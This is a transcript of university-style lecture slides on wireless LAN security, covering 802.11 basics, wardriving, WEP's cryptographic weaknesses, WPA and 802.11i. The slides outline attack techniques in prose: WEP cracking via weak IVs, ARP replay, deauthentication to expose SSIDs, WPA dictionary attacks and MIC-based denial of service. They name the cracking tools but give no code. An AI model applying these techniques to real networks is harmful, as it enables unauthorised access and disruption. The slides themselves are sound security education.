Presentation is loading. Please wait.

Presentation is loading. Please wait.

Network Security Lecture 8 Wireless LAN Security WLAN Security.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Network Security Lecture 8 Wireless LAN Security WLAN Security."— Presentation transcript:

1 Network Security Lecture 8 Wireless LAN Security WLAN Security

2 WLAN Security - Contents
Wireless LAN Technology Security History Vulnerabilities Demonstration WLAN Security

3 Wireless LANs IEEE ratified 802.11 in 1997.
Also known as Wi-Fi. Wireless LAN at 1 Mbps & 2 Mbps. WECA (Wireless Ethernet Compatibility Alliance) promoted Interoperability. Now Wi-Fi Alliance focuses on Layer 1 & Layer 2 of OSI model. Physical layer Data link layer WLAN Security

4 802.11 Components Two pieces of equipment defined: Wireless station
A desktop or laptop PC or PDA with a wireless NIC. Access point A bridge between wireless and wired networks Composed of Radio Wired network interface (usually 802.3) Bridging software Aggregates access for multiple wireless stations to wired network. WLAN Security

5 802.11 modes Infrastructure mode Ad-hoc mode Basic Service Set
One access point Extended Service Set Two or more BSSs forming a single subnet. Most corporate LANs in this mode. Ad-hoc mode Also called peer-to-peer. Independent Basic Service Set Set of wireless stations that communicate directly without an access point. Useful for quick & easy wireless networks. WLAN Security

6 Infrastructure mode Basic Service Set (BSS) – Single cell
Access Point Basic Service Set (BSS) – Single cell Station Usual configuration for offices. Extended Service Set (ESS) – Multiple cells WLAN Security

7 Independent Basic Service Set (IBSS)
Ad-hoc mode For meetings, conferences or other places where wireless infrastructure (access points) doesn’t exist. Independent Basic Service Set (IBSS) WLAN Security

8 802.11 Physical Layer Originally three alternative physical layers
Two incompatible spread-spectrum radio in 2.4Ghz ISM band Frequency Hopping Spread Spectrum (FHSS) 75 channels Direct Sequence Spread Spectrum (DSSS) 14 channels (11 channels in US) One diffuse infrared layer speed 1 Mbps or 2 Mbps. Industrial, Scientific and Medical band. WLAN Security

9 802.11 Data Link Layer Layer 2 split into:
Logical Link Control (LLC). Media Access Control (MAC). LLC - same 48-bit addresses as MAC - CSMA/CD not possible. Can’t listen for collision while transmitting. CSMA/CA – Collision Avoidance. Sender waits for clear air, waits random time, then sends data. Receiver sends explicit ACK when data arrives intact. Also handles interference. But adds overhead. always slower than equivalent Layer 2 split. LLC has same 48-bit addressing as Ethernet. Because this is a radio medium, can’t always listen for coliisions while transmitting. Therefore need a way to avoid collisions, instead of detecting collisions. WLAN Security

10 Hidden nodes WLAN Security
In the example above, each station can transmit and receive from the access point. But each station cannot transmit and receive directly to the other station. Reasons may be interference or range. As a result, each station is hidden from the other. However the access point can see both stations. WLAN Security

11 RTS / CTS To handle hidden nodes Sending station sends
“Request to Send” Access point responds with “Clear to Send” All other stations hear this and delay any transmissions. Only used for larger pieces of data. When retransmission may waste significant time. To handle the problem of hidden nodes or stations that cannot see each other, but can see a common access point, WLAN Security

12 802.11b 802.11b ratified in 1999 adding 5.5 Mbps and 11 Mbps.
DSSS as physical layer. 11 channels (3 non-overlapping) Dynamic rate shifting. Transparent to higher layers Ideally 11 Mbps. Shifts down through 5.5 Mbps, 2 Mbps to 1 Mbps. Higher ranges. Interference. Shifts back up when possible. Maximum specified range 100 metres Average throughput of 4Mbps WLAN Security

13 Joining a BSS When 802.11 client enters range of one or more APs
APs send beacons. AP beacon can include SSID. AP chosen on signal strength and observed error rates. After AP accepts client. Client tunes to AP channel. Periodically, all channels surveyed. To check for stronger or more reliable APs. If found, reassociates with new AP. Wireless NICs can measure strength of wireless signal. WLAN Security

14 Access Point Roaming Channel 1 Channel 4 Channel 9 Channel 7
WLAN Security

15 Roaming and Channels Reassociation with APs Each AP has a channel.
Moving out of range. High error rates. High network traffic. Allows load balancing. Each AP has a channel. 14 partially overlapping channels. Only three channels that have no overlap. Best for multicell coverage. WLAN Security

16 802.11a 802.11a ratified in 2001 Supports up to 54Mbps in 5 Ghz range.
Higher frequency limits the range Regulated frequency reduces interference from other devices 12 non-overlapping channels Usable range of 30 metres Average throughput of 30 Mbps Not backwards compatible WLAN Security

17 802.11g 802.11g ratified in 2002 Supports up to 54Mbps in 2.4Ghz range. Backwards compatible with b 3 non-overlapping channels Range similar to b Average throughput of 30 Mbps 802.11n due for November 2006 Aiming for maximum 200Mbps with average 100Mbps WLAN Security

18 Open System Authentication
Service Set Identifier (SSID) Station must specify SSID to Access Point when requesting association. Multiple APs with same SSID form Extended Service Set. APs can broadcast their SSID. Some clients allow * as SSID. Associates with strongest AP regardless of SSID. WLAN Security

19 MAC ACLs and SSID hiding
Access points have Access Control Lists (ACL). ACL is list of allowed MAC addresses. E.g. Allow access to: 00:01:42:0E:12:1F 00:01:42:F1:72:AE 00:01:42:4F:E2:01 But MAC addresses are sniffable and spoofable. AP Beacons without SSID Essid_jack sends deauthenticate frames to client SSID then displayed when client sends reauthenticate frames WLAN Security

20 Basic Service Set (BSS) –
Interception Range Station outside building perimeter. 100 metres Basic Service Set (BSS) – Single cell WLAN Security

21 Interception Wireless LAN uses radio signal.
Not limited to physical building. Signal is weakened by: Walls Floors Interference Directional antenna allows interception over longer distances. WLAN Security

22 Directional Antenna Directional antenna provides focused reception.
DIY plans available. Aluminium cake tin Chinese cooking sieve WLAN Security

23 WarDriving Software Laptop 802.11b,g or a PC card Optional:
Netstumbler And many more Laptop 802.11b,g or a PC card Optional: Global Positioning System Car, bicycle, boat… Logging of MAC address, network name, SSID, manufacturer, channel, signal strength, noise (GPS - location). WLAN Security

24 WarDriving results San Francisco, 2001 Commercial directional antenna
Maximum 55 miles per hour. 1500 Access Points 60% in default configuration. Most connected to internal backbones. 85% use Open System Authentication. Commercial directional antenna 25 mile range from hilltops. Peter Shipley - WLAN Security

25 Source: www.dis.org/wl/maps/
WarDriving map Source: WLAN Security

26 Worldwide War Drive 2004 Fourth WWWD 228,537 Access points
228,537 Access points 82,755 (35%) with default SSID 140,890 (60%) with Open System Authentication 62,859 (27%) with both, probably default configuration WLAN Security

27 Further issues Access Point configuration Evil Twin Access Points
Mixtures of SNMP, web, serial, telnet. Default community strings, default passwords. Evil Twin Access Points Stronger signal, capture user authentication. Renegade Access Points Unauthorised wireless LANs. WLAN Security

28 War Driving prosecutions
February 2004, Texas, Stefan Puffer acquitted of wrongful access after showing an unprotected county WLAN to officials June 2004, North Carolina, Lowes DIY store Botbyl convicted for stealing credit card numbers via unprotected WLAN Timmins convicted for checking & web browsing via unprotected WLAN June 2004, Connecticut, Myron Tereshchuk guilty of drive-by extortion via unprotected WLANs “make the check payable to M.Tereshchuk” Sep 2004, Los Angeles, Nicholas Tombros guilty of drive-by spamming via unprotected WLANs WLAN Security

29 802.11b Security Services Two security services provided:
Authentication Shared Key Authentication Encryption Wired Equivalence Privacy WLAN Security

30 Wired Equivalence Privacy
Shared key between Stations. An Access Point. Extended Service Set All Access Points will have same shared key. No key management Shared key entered manually into Stations Access points Key management nightmare in large wireless LANs WLAN Security

31 RC4 Ron’s Code number 4 RC4 can use key sizes from 1 bit to 2048 bits.
Symmetric key encryption RSA Security Inc. Designed in 1987. Trade secret until leak in 1994. RC4 can use key sizes from 1 bit to 2048 bits. RC4 generates a stream of pseudo random bits XORed with plaintext to create ciphertext. Source code leaked to cypherpunks mailing list in 1994. WLAN Security

32 WEP – Sending Compute Integrity Check Vector (ICV).
Provides integrity 32 bit Cyclic Redundancy Check. Appended to message to create plaintext. Plaintext encrypted via RC4 Provides confidentiality. Plaintext XORed with long key stream of pseudo random bits. Key stream is function of 40-bit secret key 24 bit initialisation vector Ciphertext is transmitted. WLAN Security

33 WEP Encryption  IV Initialisation Vector (IV) Cipher RC4 Key stream
text Initialisation Vector (IV) || RC4 PRNG Key stream Secret key Plaintext || 32 bit CRC WLAN Security

34 WEP – Receiving Ciphertext is received. Ciphertext decrypted via RC4
Ciphertext XORed with long key stream of pseudo random bits. Key stream is function of 40-bit secret key 24 bit initialisation vector (IV) Check ICV Separate ICV from message. Compute ICV for message Compare with received ICV WLAN Security

35 Shared Key Authentication
When station requests association with Access Point AP sends random number to station Station encrypts random number Uses RC4, 40 bit shared secret key & 24 bit IV Encrypted random number sent to AP AP decrypts received message AP compares decrypted random number to transmitted random number If numbers match, station has shared secret key. WLAN Security

36 WEP Safeguards Shared secret key required for: Messages are encrypted.
Associating with an access point. Sending data. Receiving data. Messages are encrypted. Confidentiality. Messages have checksum. Integrity. But management traffic still broadcast in clear containing SSID. WLAN Security

37 Initialisation Vector
IV must be different for every message transmitted. standard doesn’t specify how IV is calculated. Wireless cards use several methods Some use a simple ascending counter for each message. Some switch between alternate ascending and descending counters. Some use a pseudo random IV generator. If IV is the same, then two duplicate messages would result in the same ciphertext. WLAN Security

38 Passive WEP attack If 24 bit IV is an ascending counter,
If Access Point transmits at 11 Mbps, All IVs are exhausted in roughly 5 hours. Passive attack: Attacker collects all traffic Attacker could collect two messages: Encrypted with same key and same IV Statistical attacks to reveal plaintext Plaintext XOR Ciphertext = Keystream WLAN Security

39 Active WEP attack If attacker knows plaintext and ciphertext pair
Keystream is known. Attacker can create correctly encrypted messages. Access Point is deceived into accepting messages. Bitflipping Flip a bit in ciphertext Bit difference in CRC-32 can be computed WLAN Security

40 Limited WEP keys Some vendors allow limited WEP keys
User types in a passphrase WEP key is generated from passphrase Passphrases creates only 21 bits of entropy in 40 bit key. Reduces key strength to 21 bits = 2,097,152 Remaining 19 bits are predictable. 21 bit key can be brute forced in minutes. Tim Newshams site WLAN Security

41 Creating limited WEP keys
WLAN Security

42 Brute force key attack Capture ciphertext.
IV is included in message. Search all 240 possible secret keys. 1,099,511,627,776 keys ~170 days on a modern laptop Find which key decrypts ciphertext to plaintext. WLAN Security

43 128 bit WEP Vendors have extended WEP to 128 bit keys.
104 bit secret key. 24 bit IV. Brute force takes 10^19 years for 104-bit key. Effectively safeguards against brute force attacks. WLAN Security

44 Key Scheduling Weakness
Paper from Fluhrer, Mantin, Shamir, 2001. Two weaknesses: Certain keys leak into key stream. Invariance weakness. If portion of PRNG input is exposed, Analysis of initial key stream allows key to be determined. IV weakness. The invariance weakness is the existence of specific patterns, which when these patterns appear in RC4 keys, are likely to appear in the generated key stream and consequently their occurrences (in the secret key) can be easily isolated by simple analysis of the stream (sometimes the ciphertext itself is enough). The IV weakness is a practical ciphertext only attack on the WEP mode of operation of RC4, when the combination of the key and the IV is made in a simple method such as concatenation. WLAN Security

45 IV weakness WEP exposes part of PRNG input.
IV is transmitted with message. Every wireless frame has reliable first byte Sub-network Access Protocol header (SNAP) used in logical link control layer, upper sub-layer of data link layer. First byte is 0xAA Attack is: Capture packets with weak IV First byte ciphertext XOR 0xAA = First byte key stream Can determine key from initial key stream Practical for 40 bit and 104 bit keys Passive attack. Non-intrusive. No warning. WLAN Security

46 Wepcrack First tool to demonstrate attack using IV weakness.
Open source, Anton Rager. Three components Weaker IV generator. Search sniffer output for weaker IVs & record 1st byte. Cracker to combine weaker IVs and selected 1st bytes. Cumbersome. Attack relies on tcp/ip packets having well known first bytes. 1 - WeakIVGen.pl - This script allows a simple emulation of IV/encrypted output that one might observe with a WEP enable Access Point. The script generates IV combinations that can weaken the secret key used to encrypt the WEP traffic 2 - prism-getIV.pl - This script relies on output from Prismdump [or from Ethereal captures if libpcap has been patched for monitor mode], and looks for IVs that match the pattern known to weakned secret keys. This script also captures the 1st byte of the encrypted output and places it and the weak IVs in a logfile. 3 - WEPCrack.pl - This script uses data collected or generated by WeakIVGen to attempt to determine the secret key. It will work with either 40bit or 128bit WEP. WLAN Security

47 Airsnort Automated tool 100 Mb to 1 Gb of transmitted data.
Cypher42, Minnesota, USA. Does it all! Sniffs Searches for weaker IVs Records encrypted data Until key is derived. 100 Mb to 1 Gb of transmitted data. 3 to 4 hours on a very busy WLAN. WLAN Security

48 Avoid the weak IVs FMS described a simple method to find weak IVs
Many manufacturers avoid those IVs after 2002 Therefore Airsnort and others may not work on recent hardware However David Hulton aka h1kari Properly implemented FMS attack which shows many more weak IVs Identified IVs that leak into second byte of key stream. Second byte of SNAP header is also 0xAA So attack still works on recent hardware And is faster on older hardware Dwepcrack, weplab, aircrack WLAN Security

49 Generating WEP traffic
Not capturing enough traffic? Capture encrypted ARP request packets Anecdotally lengths of 68, 118 and 368 bytes appear appropriate Replay encrypted ARP packets to generate encrypted ARP replies Aireplay implements this. WLAN Security

50 802.11 safeguards Security Policy & Architecture Design
Treat as untrusted LAN Discover unauthorised use Access point audits Station protection Access point location Antenna design WLAN Security

51 Security Policy & Architecture
Define use of wireless network What is allowed What is not allowed Holistic architecture and implementation Consider all threats. Design entire architecture To minimise risk. WLAN Security

52 Wireless as untrusted LAN
Treat wireless as untrusted. Similar to Internet. Firewall between WLAN and Backbone. Extra authentication required. Intrusion Detection at WLAN / Backbone junction. Vulnerability assessments WLAN Security

53 Discover unauthorised use
Search for unauthorised access points, ad-hoc networks or clients. Port scanning For unknown SNMP agents. For unknown web or telnet interfaces. Warwalking! Sniff packets Identify IP addresses Detect signal strength But may sniff your neighbours… Wireless Intrusion Detection AirMagnet, AirDefense, Trapeze, Aruba,… WLAN Security

54 Access point audits Review security of access points.
Are passwords and community strings secure? Use Firewalls & router ACLs Limit use of access point administration interfaces. Standard access point config: SSID WEP keys Community string & password policy WLAN Security

55 Station protection Personal firewalls VPN from station into Intranet
Protect the station from attackers. VPN from station into Intranet End-to-end encryption into the trusted network. But consider roaming issues. Host intrusion detection Provide early warning of intrusions onto a station. Configuration scanning Check that stations are securely configured. WLAN Security

56 Location of Access Points
Ideally locate access points In centre of buildings. Try to avoid access points By windows On external walls Line of sight to outside Use directional antenna to “point” radio signal. WLAN Security

57 WPA Wi-Fi Protected Access “Fixes” WEP’s problems
Works with b, a and g “Fixes” WEP’s problems Existing hardware can be used 802.1x user-level authentication TKIP RC4 session-based dynamic encryption keys Per-packet key derivation Unicast and broadcast key management New 48 bit IV with new sequencing method Michael 8 byte message integrity code (MIC) Optional AES support to replace RC4 WLAN Security

58 WPA and 802.1x 802.1x is a general purpose network access control mechanism WPA has two modes Pre-shared mode, uses pre-shared keys Enterprise mode, uses Extensible Authentication Protocol (EAP) with a RADIUS server making the authentication decision EAP is a transport for authentication, not authentication itself EAP allows arbitrary authentication methods For example, Windows supports EAP-TLS requiring client and server certificates PEAP-MS-CHAPv2 WLAN Security

59 Practical WPA attacks Dictionary attack on pre-shared key mode
CoWPAtty, Joshua Wright Denial of service attack If WPA equipment sees two packets with invalid MICs in 1 second All clients are disassociated All activity stopped for one minute Two malicious packets a minute enough to stop a wireless network WLAN Security

60 802.11i Robust Security Network extends WPA Does require new hardware
Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) Based on a mode of AES, with 128 bits keys and 48 bit IV. Also adds dynamic negotiation of authentication and encryption algorithms Allows for future change Does require new hardware WLAN Security

61 Relevant RFCs Radius Extensions: RFC 2869 EAP: RFC 2284
EAP-TLS: RFC 2716 WLAN Security

62 Demonstration War driving Packet sniffing Faking Aps Cracking WEP
brute force Dictionary attack FMS / H1kari attack Airsnarf? Packet injection? WLAN Security

Download ppt "Network Security Lecture 8 Wireless LAN Security WLAN Security."

Similar presentations

Wi-Fi Technology.

Wi-Fi Technology.
CSE 6590 1.  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in 802.11  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 

CSE  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 
1 MD5 Cracking One way hash. Used in online passwords and file verification.

1 MD5 Cracking One way hash. Used in online passwords and file verification.
Security+ Guide to Network Security Fundamentals, Third Edition

Security+ Guide to Network Security Fundamentals, Third Edition
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Wireless Technologies Networking for Home and Small Businesses – Chapter.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Wireless Technologies Networking for Home and Small Businesses – Chapter.
WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.

WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.
WEP Weaknesses Or “What on Earth does this Protect” Roy Werber.

WEP Weaknesses Or “What on Earth does this Protect” Roy Werber.
1 Enhancing Wireless Security with WPA CS-265 Project Section: 2 (11:30 – 12:20) Shefali Jariwala Student ID 001790660.

1 Enhancing Wireless Security with WPA CS-265 Project Section: 2 (11:30 – 12:20) Shefali Jariwala Student ID
Wireless Local Area Networks By Edmund Gean August 2, 2000.

Wireless Local Area Networks By Edmund Gean August 2, 2000.
How To Not Make a Secure Protocol 802.11 WEP Dan Petro.

How To Not Make a Secure Protocol WEP Dan Petro.
Wired Equivalent Privacy (WEP)

Wired Equivalent Privacy (WEP)
Security in Wireless LAN 802.11 Layla Pezeshkmehr CS 265 Fall 2003-SJSU Dr.Mark Stamp.

Security in Wireless LAN Layla Pezeshkmehr CS 265 Fall 2003-SJSU Dr.Mark Stamp.
Kemal AkkayaWireless & Network Security 1 Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture.

Kemal AkkayaWireless & Network Security 1 Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture.
& WEP Tzachy Reinman System and Network Security Course

& WEP Tzachy Reinman System and Network Security Course
E-mail: kemal@cs.siu.edu Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture 9: IEEE 802.11.

Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture 9: IEEE
802.11 Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.

Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.
Security+ Guide to Network Security Fundamentals, Third Edition Chapter 6 Wireless Network Security.

Security+ Guide to Network Security Fundamentals, Third Edition Chapter 6 Wireless Network Security.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.

WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
Wireless Security Issues David E. Hudak, Ph.D. Senior Software Architect Karlnet, Inc.

Wireless Security Issues David E. Hudak, Ph.D. Senior Software Architect Karlnet, Inc.
Wireless LAN Security CS391. Overview  Wireless LAN Topology  802.11 Standards  Simple Security  WEP  802.1x  WPA  802.11i.

Wireless LAN Security CS391. Overview  Wireless LAN Topology  Standards  Simple Security  WEP  802.1x  WPA  i.

Similar presentations

Ads by Google